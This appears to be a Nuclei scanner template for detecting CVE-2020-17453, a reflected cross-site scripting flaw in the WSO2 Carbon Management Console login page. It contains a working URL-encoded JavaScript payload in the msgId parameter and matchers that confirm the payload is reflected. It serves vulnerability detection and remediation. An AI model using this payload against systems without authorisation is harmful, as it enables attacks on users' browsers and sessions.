nuclei-templates/http/cves/2020/CVE-2020-17453.yaml

51 lines
2.0 KiB
YAML

id: CVE-2020-17453
info:
name: WSO2 Carbon Management Console <=5.10 - Cross-Site Scripting
author: madrobot
severity: medium
description: WSO2 Management Console through 5.10 is susceptible to reflected cross-site scripting which can be exploited by tampering a request parameter in Management Console. This can be performed in both authenticated and unauthenticated requests.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application.
remediation: |
Upgrade to a patched version of WSO2 Carbon Management Console (5.11 or above) or apply the provided security patch to mitigate this vulnerability.
reference:
- https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2020-1132
- https://nvd.nist.gov/vuln/detail/CVE-2020-17453
- https://twitter.com/JacksonHHax/status/1374681422678519813
- https://security.docs.wso2.com/en/latest/security-announcements/security-advisories/2021/WSO2-2020-1132/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2020-17453
cwe-id: CWE-79
epss-score: 0.00845
epss-percentile: 0.80281
cpe: cpe:2.3:a:wso2:api_manager:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: wso2
product: api_manager
tags: cve2020,cve,xss,wso2
http:
- method: GET
path:
- '{{BaseURL}}/carbon/admin/login.jsp?msgId=%27%3Balert(%27document.domain%27)%2F%2F'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "'';alert('document.domain')//';"
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
# digest: 4a0a004730450221009412b87b36b8d6b57d528b9539ded5fcd3292f2d4c40f265718c149474af1ef302204e719326b9baa6543daa556f11fdd0e2e6055484ec7f8d84d31d9f2e04654a1e:922c64590222798bb761d5b6d8e72950